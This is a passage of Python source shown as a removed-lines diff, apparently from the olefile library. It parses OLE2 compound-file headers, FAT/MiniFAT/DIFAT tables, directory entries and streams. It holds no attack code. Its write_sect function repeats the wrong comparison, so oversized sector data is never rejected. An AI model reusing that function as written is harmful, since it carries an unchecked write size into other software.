- # obtain the filesize by using seek and tell, which should work on most
- # file-like objects:
- #TODO: do it above, using getsize with filename when possible?
- #TODO: fix code to fail with clear exception when filesize cannot be obtained
- filesize=0
- self.fp.seek(0, os.SEEK_END)
- try:
- filesize = self.fp.tell()
- finally:
- self.fp.seek(0)
- self._filesize = filesize
- log.debug('File size: %d bytes (%Xh)' % (self._filesize, self._filesize))
-
- # lists of streams in FAT and MiniFAT, to detect duplicate references
- # (list of indexes of first sectors of each stream)
- self._used_streams_fat = []
- self._used_streams_minifat = []
-
- header = self.fp.read(512)
-
- if len(header) != 512 or header[:8] != MAGIC:
- log.debug('Magic = %r instead of %r' % (header[:8], MAGIC))
- self._raise_defect(DEFECT_FATAL, "not an OLE2 structured storage file")
-
- # [PL] header structure according to AAF specifications:
- ##Header
- ##struct StructuredStorageHeader { // [offset from start (bytes), length (bytes)]
- ##BYTE _abSig[8]; // [00H,08] {0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1,
- ## // 0x1a, 0xe1} for current version
- ##CLSID _clsid; // [08H,16] reserved must be zero (WriteClassStg/
- ## // GetClassFile uses root directory class id)
- ##USHORT _uMinorVersion; // [18H,02] minor version of the format: 33 is
- ## // written by reference implementation
- ##USHORT _uDllVersion; // [1AH,02] major version of the dll/format: 3 for
- ## // 512-byte sectors, 4 for 4 KB sectors
- ##USHORT _uByteOrder; // [1CH,02] 0xFFFE: indicates Intel byte-ordering
- ##USHORT _uSectorShift; // [1EH,02] size of sectors in power-of-two;
- ## // typically 9 indicating 512-byte sectors
- ##USHORT _uMiniSectorShift; // [20H,02] size of mini-sectors in power-of-two;
- ## // typically 6 indicating 64-byte mini-sectors
- ##USHORT _usReserved; // [22H,02] reserved, must be zero
- ##ULONG _ulReserved1; // [24H,04] reserved, must be zero
- ##FSINDEX _csectDir; // [28H,04] must be zero for 512-byte sectors,
- ## // number of SECTs in directory chain for 4 KB
- ## // sectors
- ##FSINDEX _csectFat; // [2CH,04] number of SECTs in the FAT chain
- ##SECT _sectDirStart; // [30H,04] first SECT in the directory chain
- ##DFSIGNATURE _signature; // [34H,04] signature used for transactions; must
- ## // be zero. The reference implementation
- ## // does not support transactions
- ##ULONG _ulMiniSectorCutoff; // [38H,04] maximum size for a mini stream;
- ## // typically 4096 bytes
- ##SECT _sectMiniFatStart; // [3CH,04] first SECT in the MiniFAT chain
- ##FSINDEX _csectMiniFat; // [40H,04] number of SECTs in the MiniFAT chain
- ##SECT _sectDifStart; // [44H,04] first SECT in the DIFAT chain
- ##FSINDEX _csectDif; // [48H,04] number of SECTs in the DIFAT chain
- ##SECT _sectFat[109]; // [4CH,436] the SECTs of first 109 FAT sectors
- ##};
-
- # [PL] header decoding:
- # '<' indicates little-endian byte ordering for Intel (cf. struct module help)
- fmt_header = '<8s16sHHHHHHLLLLLLLLLL'
- header_size = struct.calcsize(fmt_header)
- log.debug( "fmt_header size = %d, +FAT = %d" % (header_size, header_size + 109*4) )
- header1 = header[:header_size]
- (
- self.header_signature,
- self.header_clsid,
- self.minor_version,
- self.dll_version,
- self.byte_order,
- self.sector_shift,
- self.mini_sector_shift,
- self.reserved1,
- self.reserved2,
- self.num_dir_sectors,
- self.num_fat_sectors,
- self.first_dir_sector,
- self.transaction_signature_number,
- self.mini_stream_cutoff_size,
- self.first_mini_fat_sector,
- self.num_mini_fat_sectors,
- self.first_difat_sector,
- self.num_difat_sectors
- ) = struct.unpack(fmt_header, header1)
- log.debug( struct.unpack(fmt_header, header1))
-
- if self.header_signature != MAGIC:
- # OLE signature should always be present
- self._raise_defect(DEFECT_FATAL, "incorrect OLE signature")
- if self.header_clsid != bytearray(16):
- # according to AAF specs, CLSID should always be zero
- self._raise_defect(DEFECT_INCORRECT, "incorrect CLSID in OLE header")
- log.debug( "Minor Version = %d" % self.minor_version )
- # TODO: according to MS-CFB, minor version should be 0x003E
- log.debug( "DLL Version = %d (expected: 3 or 4)" % self.dll_version )
- if self.dll_version not in [3, 4]:
- # version 3: usual format, 512 bytes per sector
- # version 4: large format, 4K per sector
- self._raise_defect(DEFECT_INCORRECT, "incorrect DllVersion in OLE header")
- log.debug( "Byte Order = %X (expected: FFFE)" % self.byte_order )
- if self.byte_order != 0xFFFE:
- # For now only common little-endian documents are handled correctly
- self._raise_defect(DEFECT_INCORRECT, "incorrect ByteOrder in OLE header")
- # TODO: add big-endian support for documents created on Mac ?
- # But according to [MS-CFB] ? v20140502, ByteOrder MUST be 0xFFFE.
- self.sector_size = 2**self.sector_shift
- log.debug( "Sector Size = %d bytes (expected: 512 or 4096)" % self.sector_size )
- if self.sector_size not in [512, 4096]:
- self._raise_defect(DEFECT_INCORRECT, "incorrect sector_size in OLE header")
- if (self.dll_version==3 and self.sector_size!=512) \
- or (self.dll_version==4 and self.sector_size!=4096):
- self._raise_defect(DEFECT_INCORRECT, "sector_size does not match DllVersion in OLE header")
- self.mini_sector_size = 2**self.mini_sector_shift
- log.debug( "MiniFAT Sector Size = %d bytes (expected: 64)" % self.mini_sector_size )
- if self.mini_sector_size not in [64]:
- self._raise_defect(DEFECT_INCORRECT, "incorrect mini_sector_size in OLE header")
- if self.reserved1 != 0 or self.reserved2 != 0:
- self._raise_defect(DEFECT_INCORRECT, "incorrect OLE header (non-null reserved bytes)")
- log.debug( "Number of Directory sectors = %d" % self.num_dir_sectors )
- # Number of directory sectors (only allowed if DllVersion != 3)
- if self.sector_size==512 and self.num_dir_sectors!=0:
- self._raise_defect(DEFECT_INCORRECT, "incorrect number of directory sectors in OLE header")
- log.debug( "Number of FAT sectors = %d" % self.num_fat_sectors )
- # num_fat_sectors = number of FAT sectors in the file
- log.debug( "First Directory sector = %Xh" % self.first_dir_sector )
- # first_dir_sector = 1st sector containing the directory
- log.debug( "Transaction Signature Number = %d" % self.transaction_signature_number )
- # Signature should be zero, BUT some implementations do not follow this
- # rule => only a potential defect:
- # (according to MS-CFB, may be != 0 for applications supporting file
- # transactions)
- if self.transaction_signature_number != 0:
- self._raise_defect(DEFECT_POTENTIAL, "incorrect OLE header (transaction_signature_number>0)")
- log.debug( "Mini Stream cutoff size = %Xh (expected: 1000h)" % self.mini_stream_cutoff_size )
- # MS-CFB: This integer field MUST be set to 0x00001000. This field
- # specifies the maximum size of a user-defined data stream allocated
- # from the mini FAT and mini stream, and that cutoff is 4096 bytes.
- # Any user-defined data stream larger than or equal to this cutoff size
- # must be allocated as normal sectors from the FAT.
- if self.mini_stream_cutoff_size != 0x1000:
- self._raise_defect(DEFECT_INCORRECT, "incorrect mini_stream_cutoff_size in OLE header")
- # if no exception is raised, the cutoff size is fixed to 0x1000
- log.warning('Fixing the mini_stream_cutoff_size to 4096 (mandatory value) instead of %d' %
- self.mini_stream_cutoff_size)
- self.mini_stream_cutoff_size = 0x1000
- # TODO: check if these values are OK
- log.debug( "First MiniFAT sector = %Xh" % self.first_mini_fat_sector )
- log.debug( "Number of MiniFAT sectors = %d" % self.num_mini_fat_sectors )
- log.debug( "First DIFAT sector = %Xh" % self.first_difat_sector )
- log.debug( "Number of DIFAT sectors = %d" % self.num_difat_sectors )
-
- # calculate the number of sectors in the file
- # (-1 because header doesn't count)
- self.nb_sect = ( (filesize + self.sector_size-1) // self.sector_size) - 1
- log.debug( "Maximum number of sectors in the file: %d (%Xh)" % (self.nb_sect, self.nb_sect))
- #TODO: change this test, because an OLE file MAY contain other data
- # after the last sector.
-
- # file clsid
- self.header_clsid = _clsid(header[8:24])
-
- #TODO: remove redundant attributes, and fix the code which uses them?
- self.sectorsize = self.sector_size #1 << i16(header, 30)
- self.minisectorsize = self.mini_sector_size #1 << i16(header, 32)
- self.minisectorcutoff = self.mini_stream_cutoff_size # i32(header, 56)
-
- # check known streams for duplicate references (these are always in FAT,
- # never in MiniFAT):
- self._check_duplicate_stream(self.first_dir_sector)
- # check MiniFAT only if it is not empty:
- if self.num_mini_fat_sectors:
- self._check_duplicate_stream(self.first_mini_fat_sector)
- # check DIFAT only if it is not empty:
- if self.num_difat_sectors:
- self._check_duplicate_stream(self.first_difat_sector)
-
- # Load file allocation tables
- self.loadfat(header)
- # Load directory. This sets both the direntries list (ordered by sid)
- # and the root (ordered by hierarchy) members.
- self.loaddirectory(self.first_dir_sector)
- self.ministream = None
- self.minifatsect = self.first_mini_fat_sector
-
-
- def close(self):
- """
- close the OLE file, to release the file object
- """
- self.fp.close()
-
-
- def _check_duplicate_stream(self, first_sect, minifat=False):
- """
- Checks if a stream has not been already referenced elsewhere.
- This method should only be called once for each known stream, and only
- if stream size is not null.
-
- :param first_sect: int, index of first sector of the stream in FAT
- :param minifat: bool, if True, stream is located in the MiniFAT, else in the FAT
- """
- if minifat:
- log.debug('_check_duplicate_stream: sect=%Xh in MiniFAT' % first_sect)
- used_streams = self._used_streams_minifat
- else:
- log.debug('_check_duplicate_stream: sect=%Xh in FAT' % first_sect)
- # some values can be safely ignored (not a real stream):
- if first_sect in (DIFSECT,FATSECT,ENDOFCHAIN,FREESECT):
- return
- used_streams = self._used_streams_fat
- #TODO: would it be more efficient using a dict or hash values, instead
- # of a list of long ?
- if first_sect in used_streams:
- self._raise_defect(DEFECT_INCORRECT, 'Stream referenced twice')
- else:
- used_streams.append(first_sect)
-
-
- def dumpfat(self, fat, firstindex=0):
- """
- Display a part of FAT in human-readable form for debugging purposes
- """
- # dictionary to convert special FAT values in human-readable strings
- VPL = 8 # values per line (8+1 * 8+1 = 81)
- fatnames = {
- FREESECT: "..free..",
- ENDOFCHAIN: "[ END. ]",
- FATSECT: "FATSECT ",
- DIFSECT: "DIFSECT "
- }
- nbsect = len(fat)
- nlines = (nbsect+VPL-1)//VPL
- print("index", end=" ")
- for i in range(VPL):
- print("%8X" % i, end=" ")
- print()
- for l in range(nlines):
- index = l*VPL
- print("%6X:" % (firstindex+index), end=" ")
- for i in range(index, index+VPL):
- if i>=nbsect:
- break
- sect = fat[i]
- aux = sect & 0xFFFFFFFF # JYTHON-WORKAROUND
- if aux in fatnames:
- name = fatnames[aux]
- else:
- if sect == i+1:
- name = " --->"
- else:
- name = "%8X" % sect
- print(name, end=" ")
- print()
-
-
- def dumpsect(self, sector, firstindex=0):
- """
- Display a sector in a human-readable form, for debugging purposes
- """
- VPL=8 # number of values per line (8+1 * 8+1 = 81)
- tab = array.array(UINT32, sector)
- if sys.byteorder == 'big':
- tab.byteswap()
- nbsect = len(tab)
- nlines = (nbsect+VPL-1)//VPL
- print("index", end=" ")
- for i in range(VPL):
- print("%8X" % i, end=" ")
- print()
- for l in range(nlines):
- index = l*VPL
- print("%6X:" % (firstindex+index), end=" ")
- for i in range(index, index+VPL):
- if i>=nbsect:
- break
- sect = tab[i]
- name = "%8X" % sect
- print(name, end=" ")
- print()
-
- def sect2array(self, sect):
- """
- convert a sector to an array of 32 bits unsigned integers,
- swapping bytes on big endian CPUs such as PowerPC (old Macs)
- """
- a = array.array(UINT32, sect)
- # if CPU is big endian, swap bytes:
- if sys.byteorder == 'big':
- a.byteswap()
- return a
-
-
- def loadfat_sect(self, sect):
- """
- Adds the indexes of the given sector to the FAT
-
- :param sect: string containing the first FAT sector, or array of long integers
- :returns: index of last FAT sector.
- """
- # a FAT sector is an array of ulong integers.
- if isinstance(sect, array.array):
- # if sect is already an array it is directly used
- fat1 = sect
- else:
- # if it's a raw sector, it is parsed in an array
- fat1 = self.sect2array(sect)
- # Display the sector contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- self.dumpsect(sect)
- # The FAT is a sector chain starting at the first index of itself.
- # initialize isect, just in case:
- isect = None
- for isect in fat1:
- isect = isect & 0xFFFFFFFF # JYTHON-WORKAROUND
- log.debug("isect = %X" % isect)
- if isect == ENDOFCHAIN or isect == FREESECT:
- # the end of the sector chain has been reached
- log.debug("found end of sector chain")
- break
- # read the FAT sector
- s = self.getsect(isect)
- # parse it as an array of 32 bits integers, and add it to the
- # global FAT array
- nextfat = self.sect2array(s)
- self.fat = self.fat + nextfat
- return isect
-
-
- def loadfat(self, header):
- """
- Load the FAT table.
- """
- # The 1st sector of the file contains sector numbers for the first 109
- # FAT sectors, right after the header which is 76 bytes long.
- # (always 109, whatever the sector size: 512 bytes = 76+4*109)
- # Additional sectors are described by DIF blocks
-
- log.debug('Loading the FAT table, starting with the 1st sector after the header')
- sect = header[76:512]
- log.debug( "len(sect)=%d, so %d integers" % (len(sect), len(sect)//4) )
- #fat = []
- # [PL] FAT is an array of 32 bits unsigned ints, it's more effective
- # to use an array than a list in Python.
- # It's initialized as empty first:
- self.fat = array.array(UINT32)
- self.loadfat_sect(sect)
- #self.dumpfat(self.fat)
-## for i in range(0, len(sect), 4):
-## ix = i32(sect, i)
-## #[PL] if ix == -2 or ix == -1: # ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
-## if ix == 0xFFFFFFFE or ix == 0xFFFFFFFF:
-## break
-## s = self.getsect(ix)
-## #fat = fat + [i32(s, i) for i in range(0, len(s), 4)]
-## fat = fat + array.array(UINT32, s)
- if self.num_difat_sectors != 0:
- log.debug('DIFAT is used, because file size > 6.8MB.')
- # [PL] There's a DIFAT because file is larger than 6.8MB
- # some checks just in case:
- if self.num_fat_sectors <= 109:
- # there must be at least 109 blocks in header and the rest in
- # DIFAT, so number of sectors must be >109.
- self._raise_defect(DEFECT_INCORRECT, 'incorrect DIFAT, not enough sectors')
- if self.first_difat_sector >= self.nb_sect:
- # initial DIFAT block index must be valid
- self._raise_defect(DEFECT_FATAL, 'incorrect DIFAT, first index out of range')
- log.debug( "DIFAT analysis..." )
- # We compute the necessary number of DIFAT sectors :
- # Number of pointers per DIFAT sector = (sectorsize/4)-1
- # (-1 because the last pointer is the next DIFAT sector number)
- nb_difat_sectors = (self.sectorsize//4)-1
- # (if 512 bytes: each DIFAT sector = 127 pointers + 1 towards next DIFAT sector)
- nb_difat = (self.num_fat_sectors-109 + nb_difat_sectors-1)//nb_difat_sectors
- log.debug( "nb_difat = %d" % nb_difat )
- if self.num_difat_sectors != nb_difat:
- raise IOError('incorrect DIFAT')
- isect_difat = self.first_difat_sector
- for i in iterrange(nb_difat):
- log.debug( "DIFAT block %d, sector %X" % (i, isect_difat) )
- #TODO: check if corresponding FAT SID = DIFSECT
- sector_difat = self.getsect(isect_difat)
- difat = self.sect2array(sector_difat)
- # Display the sector contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- self.dumpsect(sector_difat)
- self.loadfat_sect(difat[:nb_difat_sectors])
- # last DIFAT pointer is next DIFAT sector:
- isect_difat = difat[nb_difat_sectors]
- log.debug( "next DIFAT sector: %X" % isect_difat )
- # checks:
- if isect_difat not in [ENDOFCHAIN, FREESECT]:
- # last DIFAT pointer value must be ENDOFCHAIN or FREESECT
- raise IOError('incorrect end of DIFAT')
-## if len(self.fat) != self.num_fat_sectors:
-## # FAT should contain num_fat_sectors blocks
-## print("FAT length: %d instead of %d" % (len(self.fat), self.num_fat_sectors))
-## raise IOError('incorrect DIFAT')
- else:
- log.debug('No DIFAT, because file size < 6.8MB.')
- # since FAT is read from fixed-size sectors, it may contain more values
- # than the actual number of sectors in the file.
- # Keep only the relevant sector indexes:
- if len(self.fat) > self.nb_sect:
- log.debug('len(fat)=%d, shrunk to nb_sect=%d' % (len(self.fat), self.nb_sect))
- self.fat = self.fat[:self.nb_sect]
- log.debug('FAT references %d sectors / Maximum %d sectors in file' % (len(self.fat), self.nb_sect))
- # Display the FAT contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- log.debug('\nFAT:')
- self.dumpfat(self.fat)
-
-
- def loadminifat(self):
- """
- Load the MiniFAT table.
- """
- # MiniFAT is stored in a standard sub-stream, pointed to by a header
- # field.
- # NOTE: there are two sizes to take into account for this stream:
- # 1) Stream size is calculated according to the number of sectors
- # declared in the OLE header. This allocated stream may be more than
- # needed to store the actual sector indexes.
- # (self.num_mini_fat_sectors is the number of sectors of size self.sector_size)
- stream_size = self.num_mini_fat_sectors * self.sector_size
- # 2) Actually used size is calculated by dividing the MiniStream size
- # (given by root entry size) by the size of mini sectors, *4 for
- # 32 bits indexes:
- nb_minisectors = (self.root.size + self.mini_sector_size-1) // self.mini_sector_size
- used_size = nb_minisectors * 4
- log.debug('loadminifat(): minifatsect=%d, nb FAT sectors=%d, used_size=%d, stream_size=%d, nb MiniSectors=%d' %
- (self.minifatsect, self.num_mini_fat_sectors, used_size, stream_size, nb_minisectors))
- if used_size > stream_size:
- # This is not really a problem, but may indicate a wrong implementation:
- self._raise_defect(DEFECT_INCORRECT, 'OLE MiniStream is larger than MiniFAT')
- # In any case, first read stream_size:
- s = self._open(self.minifatsect, stream_size, force_FAT=True).read()
- #[PL] Old code replaced by an array:
- #self.minifat = [i32(s, i) for i in range(0, len(s), 4)]
- self.minifat = self.sect2array(s)
- # Then shrink the array to used size, to avoid indexes out of MiniStream:
- log.debug('MiniFAT shrunk from %d to %d sectors' % (len(self.minifat), nb_minisectors))
- self.minifat = self.minifat[:nb_minisectors]
- log.debug('loadminifat(): len=%d' % len(self.minifat))
- # Display the FAT contents only if the logging level is debug:
- if log.isEnabledFor(logging.DEBUG):
- log.debug('\nMiniFAT:')
- self.dumpfat(self.minifat)
-
- def getsect(self, sect):
- """
- Read given sector from file on disk.
-
- :param sect: int, sector index
- :returns: a string containing the sector data.
- """
- # From [MS-CFB]: A sector number can be converted into a byte offset
- # into the file by using the following formula:
- # (sector number + 1) x Sector Size.
- # This implies that sector #0 of the file begins at byte offset Sector
- # Size, not at 0.
-
- # [PL] the original code in PIL was wrong when sectors are 4KB instead of
- # 512 bytes:
- #self.fp.seek(512 + self.sectorsize * sect)
- #[PL]: added safety checks:
- #print("getsect(%X)" % sect)
- try:
- self.fp.seek(self.sectorsize * (sect+1))
- except:
- log.debug('getsect(): sect=%X, seek=%d, filesize=%d' %
- (sect, self.sectorsize*(sect+1), self._filesize))
- self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range')
- sector = self.fp.read(self.sectorsize)
- if len(sector) != self.sectorsize:
- log.debug('getsect(): sect=%X, read=%d, sectorsize=%d' %
- (sect, len(sector), self.sectorsize))
- self._raise_defect(DEFECT_FATAL, 'incomplete OLE sector')
- return sector
-
-
- def write_sect(self, sect, data, padding=b'\x00'):
- """
- Write given sector to file on disk.
-
- :param sect: int, sector index
- :param data: bytes, sector data
- :param padding: single byte, padding character if data < sector size
- """
- if not isinstance(data, bytes):
- raise TypeError("write_sect: data must be a bytes string")
- if not isinstance(padding, bytes) or len(padding)!=1:
- raise TypeError("write_sect: padding must be a bytes string of 1 char")
- #TODO: we could allow padding=None for no padding at all
- try:
- self.fp.seek(self.sectorsize * (sect+1))
- except:
- log.debug('write_sect(): sect=%X, seek=%d, filesize=%d' %
- (sect, self.sectorsize*(sect+1), self._filesize))
- self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range')
- if len(data) < self.sectorsize:
- # add padding
- data += padding * (self.sectorsize - len(data))
- elif len(data) < self.sectorsize:
- raise ValueError("Data is larger than sector size")
- self.fp.write(data)
-
-
- def loaddirectory(self, sect):
- """
- Load the directory.
-
- :param sect: sector index of directory stream.
- """
- log.debug('Loading the Directory:')
- # The directory is stored in a standard
- # substream, independent of its size.
-
- # open directory stream as a read-only file:
- # (stream size is not known in advance)
- self.directory_fp = self._open(sect)
-
- #[PL] to detect malformed documents and avoid DoS attacks, the maximum
- # number of directory entries can be calculated:
- max_entries = self.directory_fp.size // 128
- log.debug('loaddirectory: size=%d, max_entries=%d' %
- (self.directory_fp.size, max_entries))
-
- # Create list of directory entries
- #self.direntries = []
- # We start with a list of "None" object
- self.direntries = [None] * max_entries
-## for sid in iterrange(max_entries):
-## entry = fp.read(128)
-## if not entry:
-## break
-## self.direntries.append(OleDirectoryEntry(entry, sid, self))
- # load root entry:
- root_entry = self._load_direntry(0)
- # Root entry is the first entry:
- self.root = self.direntries[0]
- # TODO: read ALL directory entries (ignore bad entries?)
- # TODO: adapt build_storage_tree to avoid duplicate reads
- # for i in range(1, max_entries):
- # self._load_direntry(i)
- # read and build all storage trees, starting from the root:
- self.root.build_storage_tree()
-
-
- def _load_direntry (self, sid):
- """
- Load a directory entry from the directory.
- This method should only be called once for each storage/stream when
- loading the directory.
-
- :param sid: index of storage/stream in the directory.
- :returns: a OleDirectoryEntry object
-
- :exception IOError: if the entry has always been referenced.
- """
- # check if SID is OK:
- if sid<0 or sid>=len(self.direntries):
- self._raise_defect(DEFECT_FATAL, "OLE directory index out of range")
- # check if entry was already referenced:
- if self.direntries[sid] is not None:
- self._raise_defect(DEFECT_INCORRECT,
- "double reference for OLE stream/storage")
- # if exception not raised, return the object
- return self.direntries[sid]
- self.directory_fp.seek(sid * 128)
- entry = self.directory_fp.read(128)
- self.direntries[sid] = OleDirectoryEntry(entry, sid, self)
- return self.direntries[sid]
-
-
- def dumpdirectory(self):
- """
- Dump directory (for debugging only)
- """
- self.root.dump()
-
-
- def _open(self, start, size = UNKNOWN_SIZE, force_FAT=False):
- """
- Open a stream, either in FAT or MiniFAT according to its size.
- (openstream helper)
-
- :param start: index of first sector
- :param size: size of stream (or nothing if size is unknown)
- :param force_FAT: if False (default), stream will be opened in FAT or MiniFAT
- according to size. If True, it will always be opened in FAT.
- """
- log.debug('OleFileIO.open(): sect=%Xh, size=%d, force_FAT=%s' %
- (start, size, str(force_FAT)))
- # stream size is compared to the mini_stream_cutoff_size threshold:
- if size < self.minisectorcutoff and not force_FAT:
- # ministream object
- if not self.ministream:
- # load MiniFAT if it wasn't already done:
- self.loadminifat()
- # The first sector index of the miniFAT stream is stored in the
- # root directory entry:
- size_ministream = self.root.size
- log.debug('Opening MiniStream: sect=%Xh, size=%d' %
- (self.root.isectStart, size_ministream))
- self.ministream = self._open(self.root.isectStart,
- size_ministream, force_FAT=True)
- return OleStream(fp=self.ministream, sect=start, size=size,
- offset=0, sectorsize=self.minisectorsize,
- fat=self.minifat, filesize=self.ministream.size,
- olefileio=self)
- else:
- # standard stream
- return OleStream(fp=self.fp, sect=start, size=size,
- offset=self.sectorsize,
- sectorsize=self.sectorsize, fat=self.fat,
- filesize=self._filesize,
- olefileio=self)
-
-
- def _list(self, files, prefix, node, streams=True, storages=False):
- """
- listdir helper
-
- :param files: list of files to fill in
- :param prefix: current location in storage tree (list of names)
- :param node: current node (OleDirectoryEntry object)
- :param streams: bool, include streams if True (True by default) - new in v0.26
- :param storages: bool, include storages if True (False by default) - new in v0.26
- (note: the root storage is never included)
- """
- prefix = prefix + [node.name]
- for entry in node.kids:
- if entry.entry_type == STGTY_STORAGE:
- # this is a storage
- if storages:
- # add it to the list
- files.append(prefix[1:] + [entry.name])
- # check its kids
- self._list(files, prefix, entry, streams, storages)
- elif entry.entry_type == STGTY_STREAM:
- # this is a stream
- if streams:
- # add it to the list
- files.append(prefix[1:] + [entry.name])
- else:
- self._raise_defect(DEFECT_INCORRECT, 'The directory tree contains an entry which is not a stream nor a storage.')
-
-
- def listdir(self, streams=True, storages=False):
- """
- Return a list of streams and/or storages stored in this file
-
- :param streams: bool, include streams if True (True by default) - new in v0.26
- :param storages: bool, include storages if True (False by default) - new in v0.26
- (note: the root storage is never included)
- :returns: list of stream and/or storage paths
- """
- files = []
- self._list(files, [], self.root, streams, storages)
- return files
-
-
- def _find(self, filename):
- """
- Returns directory entry of given filename. (openstream helper)
- Note: this method is case-insensitive.
-
- :param filename: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
- :returns: sid of requested filename
- :exception IOError: if file not found
- """
-
- # if filename is a string instead of a list, split it on slashes to
- # convert to a list:
- if isinstance(filename, basestring):
- filename = filename.split('/')
- # walk across storage tree, following given path:
- node = self.root
- for name in filename:
- for kid in node.kids:
- if kid.name.lower() == name.lower():
- break
- else:
- raise IOError("file not found")
- node = kid
- return node.sid
-
-
- def openstream(self, filename):
- """
- Open a stream as a read-only file object (BytesIO).
- Note: filename is case-insensitive.
-
- :param filename: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
- :returns: file object (read-only)
- :exception IOError: if filename not found, or if this is not a stream.
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- if entry.entry_type != STGTY_STREAM:
- raise IOError("this file is not a stream")
- return self._open(entry.isectStart, entry.size)
-
-
- def write_stream(self, stream_name, data):
- """
- Write a stream to disk. For now, it is only possible to replace an
- existing stream by data of the same size.
-
- :param stream_name: path of stream in storage tree (except root entry), either:
-
- - a string using Unix path syntax, for example:
- 'storage_1/storage_1.2/stream'
- - or a list of storage filenames, path to the desired stream/storage.
- Example: ['storage_1', 'storage_1.2', 'stream']
-
- :param data: bytes, data to be written, must be the same size as the original
- stream.
- """
- if not isinstance(data, bytes):
- raise TypeError("write_stream: data must be a bytes string")
- sid = self._find(stream_name)
- entry = self.direntries[sid]
- if entry.entry_type != STGTY_STREAM:
- raise IOError("this is not a stream")
- size = entry.size
- if size != len(data):
- raise ValueError("write_stream: data must be the same size as the existing stream")
- if size < self.minisectorcutoff:
- raise NotImplementedError("Writing a stream in MiniFAT is not implemented yet")
- sect = entry.isectStart
- # number of sectors to write
- nb_sectors = (size + (self.sectorsize-1)) // self.sectorsize
- log.debug('nb_sectors = %d' % nb_sectors)
- for i in range(nb_sectors):
-## try:
-## self.fp.seek(offset + self.sectorsize * sect)
-## except:
-## log.debug('sect=%d, seek=%d' %
-## (sect, offset+self.sectorsize*sect))
-## raise IOError('OLE sector index out of range')
- # extract one sector from data, the last one being smaller:
- if i<(nb_sectors-1):
- data_sector = data [i*self.sectorsize : (i+1)*self.sectorsize]
- #TODO: comment this if it works
- assert(len(data_sector)==self.sectorsize)
- else:
- data_sector = data [i*self.sectorsize:]
- #TODO: comment this if it works
- log.debug('write_stream: size=%d sectorsize=%d data_sector=%Xh size%%sectorsize=%d'
- % (size, self.sectorsize, len(data_sector), size % self.sectorsize))
- assert(len(data_sector) % self.sectorsize==size % self.sectorsize)
- self.write_sect(sect, data_sector)
-## self.fp.write(data_sector)
- # jump to next sector in the FAT:
- try:
- sect = self.fat[sect]
- except IndexError:
- # [PL] if pointer is out of the FAT an exception is raised
- raise IOError('incorrect OLE FAT, sector index out of range')
- #[PL] Last sector should be a "end of chain" marker:
- if sect != ENDOFCHAIN:
- raise IOError('incorrect last sector index in OLE stream')
-
-
- def get_type(self, filename):
- """
- Test if given filename exists as a stream or a storage in the OLE
- container, and return its type.
-
- :param filename: path of stream in storage tree. (see openstream for syntax)
- :returns: False if object does not exist, its entry type (>0) otherwise:
-
- - STGTY_STREAM: a stream
- - STGTY_STORAGE: a storage
- - STGTY_ROOT: the root entry
- """
- try:
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.entry_type
- except:
- return False
-
-
- def getclsid(self, filename):
- """
- Return clsid of a stream/storage.
-
- :param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
- :returns: Empty string if clsid is null, a printable representation of the clsid otherwise
-
- new in version 0.44
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.clsid
-
-
- def getmtime(self, filename):
- """
- Return modification time of a stream/storage.
-
- :param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
- :returns: None if modification time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.getmtime()
-
-
- def getctime(self, filename):
- """
- Return creation time of a stream/storage.
-
- :param filename: path of stream/storage in storage tree. (see openstream for
- syntax)
- :returns: None if creation time is null, a python datetime object
- otherwise (UTC timezone)
-
- new in version 0.26
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- return entry.getctime()
-
-
- def exists(self, filename):
- """
- Test if given filename exists as a stream or a storage in the OLE
- container.
- Note: filename is case-insensitive.
-
- :param filename: path of stream in storage tree. (see openstream for syntax)
- :returns: True if object exist, else False.
- """
- try:
- sid = self._find(filename)
- return True
- except:
- return False
-
-
- def get_size(self, filename):
- """
- Return size of a stream in the OLE container, in bytes.
-
- :param filename: path of stream in storage tree (see openstream for syntax)
- :returns: size in bytes (long integer)
- :exception IOError: if file not found
- :exception TypeError: if this is not a stream.
- """
- sid = self._find(filename)
- entry = self.direntries[sid]
- if entry.entry_type != STGTY_STREAM:
- #TODO: Should it return zero instead of raising an exception ?
- raise TypeError('object is not an OLE stream')
- return entry.size
-
-
- def get_rootentry_name(self):
- """
- Return root entry name. Should usually be 'Root Entry' or 'R' in most
- implementations.
- """
- return self.root.name
-
-
- def getproperties(self, filename, convert_time=False, no_conversion=None):
- """
- Return properties described in substream.
-
- :param filename: path of stream in storage tree (see openstream for syntax)
- :param convert_time: bool, if True timestamps will be converted to Python datetime
- :param no_conversion: None or list of int, timestamps not to be converted
- (for example total editing time is not a real timestamp)
-
- :returns: a dictionary of values indexed by id (integer)
- """
- #REFERENCE: [MS-OLEPS] https://msdn.microsoft.com/en-us/library/dd942421.aspx
- # make sure no_conversion is a list, just to simplify code below:
- if no_conversion == None:
- no_conversion = []
- # stream path as a string to report exceptions:
- streampath = filename
- if not isinstance(streampath, str):
- streampath = '/'.join(streampath)
-
- fp = self.openstream(filename)
-
- data = {}
-
- try:
- # header
- s = fp.read(28)
- clsid = _clsid(s[8:24])
-
- # format id
- s = fp.read(20)
- fmtid = _clsid(s[:16])
- fp.seek(i32(s, 16))
-
- # get section
- s = b"****" + fp.read(i32(fp.read(4))-4)
- # number of properties:
- num_props = i32(s, 4)
- except BaseException as exc:
- # catch exception while parsing property header, and only raise
- # a DEFECT_INCORRECT then return an empty dict, because this is not
